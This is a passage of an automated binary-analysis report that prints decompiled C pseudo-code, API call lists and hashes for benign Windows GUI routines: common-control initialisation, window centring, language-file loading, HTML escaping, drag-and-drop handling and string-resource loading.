                                                                                                                            • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                            • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                            • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                            • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                            0x0040314a
                                                                                                                            0x00403151
                                                                                                                            0x00403158
                                                                                                                            0x0040315a
                                                                                                                            0x00403162
                                                                                                                            0x00403166
                                                                                                                            0x00403190
                                                                                                                            0x00403190
                                                                                                                            0x00403198
                                                                                                                            0x00403199
                                                                                                                            0x0040319e
                                                                                                                            0x004031bb
                                                                                                                            0x004031a0
                                                                                                                            0x004031ad
                                                                                                                            0x004031b6
                                                                                                                            0x004031b6
                                                                                                                            0x0040319e
                                                                                                                            0x0040316e
                                                                                                                            0x00403176
                                                                                                                            0x0040317c
                                                                                                                            0x0040317f
                                                                                                                            0x0040317f
                                                                                                                            0x00403182
                                                                                                                            0x0040318a
                                                                                                                            0x00000000
                                                                                                                            0x0040318c
                                                                                                                            0x0040318c
                                                                                                                            0x00000000
                                                                                                                            0x0040318c

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                            • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                            • API String ID: 2780580303-317687271
                                                                                                                            • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                            • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                            • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                            • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                            0x00404da9
                                                                                                                            0x00404dbc
                                                                                                                            0x00404dbf
                                                                                                                            0x00404dc6
                                                                                                                            0x00404dcc
                                                                                                                            0x00404dce
                                                                                                                            0x00404de1
                                                                                                                            0x00404deb
                                                                                                                            0x00404df2
                                                                                                                            0x00404df4
                                                                                                                            0x00404df4
                                                                                                                            0x00404e07
                                                                                                                            0x00404e0d
                                                                                                                            0x00404e18
                                                                                                                            0x00404e1c
                                                                                                                            0x00404e1e
                                                                                                                            0x00404e27
                                                                                                                            0x00404e28
                                                                                                                            0x00404e29
                                                                                                                            0x00404e2f
                                                                                                                            0x00404e31
                                                                                                                            0x00404e37
                                                                                                                            0x00404e41
                                                                                                                            0x00404e42
                                                                                                                            0x00404e43
                                                                                                                            0x00404e46
                                                                                                                            0x00404e46
                                                                                                                            0x00404e1c
                                                                                                                            0x00404e4d
                                                                                                                            0x00404e50
                                                                                                                            0x00404e5f
                                                                                                                            0x00404e66
                                                                                                                            0x00404e52
                                                                                                                            0x00404e52
                                                                                                                            0x00404e52
                                                                                                                            0x00404e6d
                                                                                                                            0x00404e70
                                                                                                                            0x00404e85
                                                                                                                            0x00404e85
                                                                                                                            0x00000000
                                                                                                                            0x00404e72
                                                                                                                            0x00404e7b
                                                                                                                            0x00404e80
                                                                                                                            0x00404e83
                                                                                                                            0x00404e87
                                                                                                                            0x00404e89
                                                                                                                            0x00404e8b
                                                                                                                            0x00404e8b
                                                                                                                            0x00404ea8
                                                                                                                            0x00404ea8
                                                                                                                            0x00000000
                                                                                                                            0x00404e83

                                                                                                                            APIs
                                                                                                                            • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                            • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                            • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                            • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                            • GetWindowRect.USER32 ref: 00404E07
                                                                                                                            • GetParent.USER32(?), ref: 00404E12
                                                                                                                            • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2163313125-0
                                                                                                                            • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                            • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                            • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                            • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 88%
                                                                                                                            			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                            0x0040639c
                                                                                                                            0x004063a4
                                                                                                                            0x004063b2
                                                                                                                            0x004063c2
                                                                                                                            0x004063d3
                                                                                                                            0x004063dc
                                                                                                                            0x004063eb
                                                                                                                            0x004063f0
                                                                                                                            0x00406401
                                                                                                                            0x00000000
                                                                                                                            0x0040641e
                                                                                                                            0x0040641f

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                            • wcscpy.MSVCRT ref: 004063B2
                                                                                                                            • wcscpy.MSVCRT ref: 004063C2
                                                                                                                            • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                              • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32(0040FDA0,?,0040C4E8,0040FE30,?,0040FB90), ref: 00405F30
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                            • API String ID: 3176057301-2039793938
                                                                                                                            • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                            • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                            • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                            • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 16%
                                                                                                                            			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                            0x0040adf6
                                                                                                                            0x0040adf8
                                                                                                                            0x0040adfa
                                                                                                                            0x0040adfb
                                                                                                                            0x0040adfb
                                                                                                                            0x0040ae02
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ae04
                                                                                                                            0x0040ae05
                                                                                                                            0x0040ae6d
                                                                                                                            0x0040ae6e
                                                                                                                            0x0040ae73
                                                                                                                            0x0040ae76
                                                                                                                            0x0040ae7f
                                                                                                                            0x0040ae83
                                                                                                                            0x0040ae86
                                                                                                                            0x00000000
                                                                                                                            0x0040ae86
                                                                                                                            0x0040ae8f
                                                                                                                            0x0040ae0c
                                                                                                                            0x0040ae10
                                                                                                                            0x0040ae1e
                                                                                                                            0x0040ae3b
                                                                                                                            0x0040ae4a
                                                                                                                            0x0040ae65
                                                                                                                            0x0040ae7a
                                                                                                                            0x0040ae7e
                                                                                                                            0x0040ae67
                                                                                                                            0x0040ae67
                                                                                                                            0x0040ae68
                                                                                                                            0x00000000
                                                                                                                            0x0040ae68
                                                                                                                            0x0040ae4c
                                                                                                                            0x0040ae4c
                                                                                                                            0x0040ae4e
                                                                                                                            0x00000000
                                                                                                                            0x0040ae4e
                                                                                                                            0x0040ae3d
                                                                                                                            0x0040ae3d
                                                                                                                            0x0040ae3f
                                                                                                                            0x0040ae53
                                                                                                                            0x0040ae54
                                                                                                                            0x0040ae59
                                                                                                                            0x0040ae5c
                                                                                                                            0x0040ae5c
                                                                                                                            0x0040ae20
                                                                                                                            0x0040ae28
                                                                                                                            0x0040ae2d
                                                                                                                            0x0040ae30
                                                                                                                            0x0040ae30
                                                                                                                            0x0040ae12
                                                                                                                            0x0040ae12
                                                                                                                            0x0040ae13
                                                                                                                            0x00000000
                                                                                                                            0x0040ae13
                                                                                                                            0x00000000
                                                                                                                            0x0040ae10

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                            • API String ID: 3510742995-3273207271
                                                                                                                            • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                            • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                            • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                            • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                            0x004041f9
                                                                                                                            0x00404205
                                                                                                                            0x00404208
                                                                                                                            0x00404217
                                                                                                                            0x0040421e
                                                                                                                            0x00404236
                                                                                                                            0x0040423f
                                                                                                                            0x0040424a
                                                                                                                            0x0040425f
                                                                                                                            0x0040426b
                                                                                                                            0x0040426e
                                                                                                                            0x0040426e
                                                                                                                            0x00404275
                                                                                                                            0x004043be
                                                                                                                            0x004043ce
                                                                                                                            0x004043d0
                                                                                                                            0x004043d3
                                                                                                                            0x004043da
                                                                                                                            0x004043da
                                                                                                                            0x004043c0
                                                                                                                            0x004043c3
                                                                                                                            0x004043c3
                                                                                                                            0x0040427b
                                                                                                                            0x0040428c
                                                                                                                            0x0040428f
                                                                                                                            0x00404295
                                                                                                                            0x004042a5
                                                                                                                            0x004042b8
                                                                                                                            0x004042cb
                                                                                                                            0x004042de
                                                                                                                            0x004042f1
                                                                                                                            0x00404304
                                                                                                                            0x00404317
                                                                                                                            0x0040432a
                                                                                                                            0x0040433d
                                                                                                                            0x00404350
                                                                                                                            0x00404363
                                                                                                                            0x00404376
                                                                                                                            0x00404389
                                                                                                                            0x0040439c
                                                                                                                            0x004043a4
                                                                                                                            0x004043af
                                                                                                                            0x004043b5
                                                                                                                            0x004043b5
                                                                                                                            0x004043f5

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 0040421E
                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                            • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                              • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                              • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                              • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                              • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                              • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                                                                            • BeginDeferWindowPos.USER32(0000000D), ref: 0040427D
                                                                                                                            • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                            • String ID: $
                                                                                                                            • API String ID: 2142561256-3993045852
                                                                                                                            • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                            • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                            • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                            • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 55%
                                                                                                                            			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                            0x00405b81
                                                                                                                            0x00405b88
                                                                                                                            0x00405b8a
                                                                                                                            0x00405b8a
                                                                                                                            0x00405b8f
                                                                                                                            0x00405b96
                                                                                                                            0x00405b9b
                                                                                                                            0x00405bad
                                                                                                                            0x00405bad
                                                                                                                            0x00405b9d
                                                                                                                            0x00405b9d
                                                                                                                            0x00405ba8
                                                                                                                            0x00405bab
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405bab
                                                                                                                            0x00405be9
                                                                                                                            0x00405be9
                                                                                                                            0x00405baf
                                                                                                                            0x00405bb1
                                                                                                                            0x00405ce2
                                                                                                                            0x00405ce2
                                                                                                                            0x00405bb7
                                                                                                                            0x00405bbd
                                                                                                                            0x00405bf6
                                                                                                                            0x00405c4b
                                                                                                                            0x00405c4c
                                                                                                                            0x00405c52
                                                                                                                            0x00405c53
                                                                                                                            0x00000000
                                                                                                                            0x00405bf8
                                                                                                                            0x00405c02
                                                                                                                            0x00405c0e
                                                                                                                            0x00405c13
                                                                                                                            0x00405c18
                                                                                                                            0x00405c2c
                                                                                                                            0x00405c2e
                                                                                                                            0x00405c3b
                                                                                                                            0x00405c3c
                                                                                                                            0x00405c42
                                                                                                                            0x00000000
                                                                                                                            0x00405c1a
                                                                                                                            0x00405c25
                                                                                                                            0x00405c2a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405c2a
                                                                                                                            0x00405c18
                                                                                                                            0x00405bbf
                                                                                                                            0x00405bc0
                                                                                                                            0x00405bcd
                                                                                                                            0x00405bce
                                                                                                                            0x00405bd7
                                                                                                                            0x00405c58
                                                                                                                            0x00405c5f
                                                                                                                            0x00405c61
                                                                                                                            0x00405c61
                                                                                                                            0x00405c63
                                                                                                                            0x00405cdb
                                                                                                                            0x00405cdb
                                                                                                                            0x00405c65
                                                                                                                            0x00405c65
                                                                                                                            0x00405c74
                                                                                                                            0x00000000
                                                                                                                            0x00405c84
                                                                                                                            0x00405c8a
                                                                                                                            0x00405c8d
                                                                                                                            0x00405c99
                                                                                                                            0x00405caf
                                                                                                                            0x00405cbd
                                                                                                                            0x00405cc8
                                                                                                                            0x00405cd4
                                                                                                                            0x00405cd9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405cd9
                                                                                                                            0x00405c74
                                                                                                                            0x00405c63
                                                                                                                            0x00405ce6

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                            • wcscpy.MSVCRT ref: 00405C02
                                                                                                                              • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                              • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                            • wcslen.MSVCRT ref: 00405C20
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
